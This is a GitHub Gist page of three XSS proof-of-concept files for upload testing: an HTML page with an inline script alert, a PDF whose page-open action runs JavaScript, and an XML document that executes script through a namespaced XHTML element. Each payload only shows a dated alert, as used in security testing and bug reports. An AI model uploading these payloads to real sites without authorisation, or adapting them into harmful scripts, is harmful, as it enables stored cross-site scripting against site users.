Created
April 20, 2023 05:21
-
-
Save wuuconix/cda14f831391a3fbbf58786f7a573cf8 to your computer and use it in GitHub Desktop.
xss四件套
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<title>XSS Prove Using HTML</title> | |
</head> | |
<body> | |
<div class="flex"> | |
<img src="https://gzw.sinaimg.cn/large/007YVyKcly1h2kl9rs23cj30ma0mlk48.jpg"> | |
</div> | |
</body> | |
</html> | |
<style> | |
.flex { | |
display: flex; | |
justify-content: center; | |
align-items: center; | |
} | |
img { | |
width: 200px; | |
} | |
</style> | |
<script> | |
alert("xss proved using html. 2023/4/19") | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
%PDF-1.3 | |
%���� | |
1 0 obj | |
<</Pages 2 0 R /Type /Catalog>> | |
endobj | |
2 0 obj | |
<</Count 1 /Kids [3 0 R] /Type /Pages>> | |
endobj | |
3 0 obj | |
<</AA | |
<</O | |
<</JS | |
( | |
try { | |
app.alert\("XSS proved using pdf -- 2023/4/19"\) | |
} catch \(e\) { | |
app.alert\(e.message\); | |
} | |
) | |
/S /JavaScript>>>> | |
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R | |
/Resources | |
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>> | |
/Type /Page>> | |
endobj | |
4 0 obj | |
<</Length 21>> | |
stream | |
BT | |
/F1 24 Tf | |
ET | |
endstream | |
endobj | |
xref | |
0 5 | |
0000000000 65535 f | |
0000000015 00000 n | |
0000000062 00000 n | |
0000000117 00000 n | |
0000000424 00000 n | |
trailer | |
<</Root 1 0 R /Size 5>> | |
startxref | |
493 | |
%%EOF |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head></head> | |
<body> | |
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("xss proved using xml —— 2023/4/19")</something:script> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment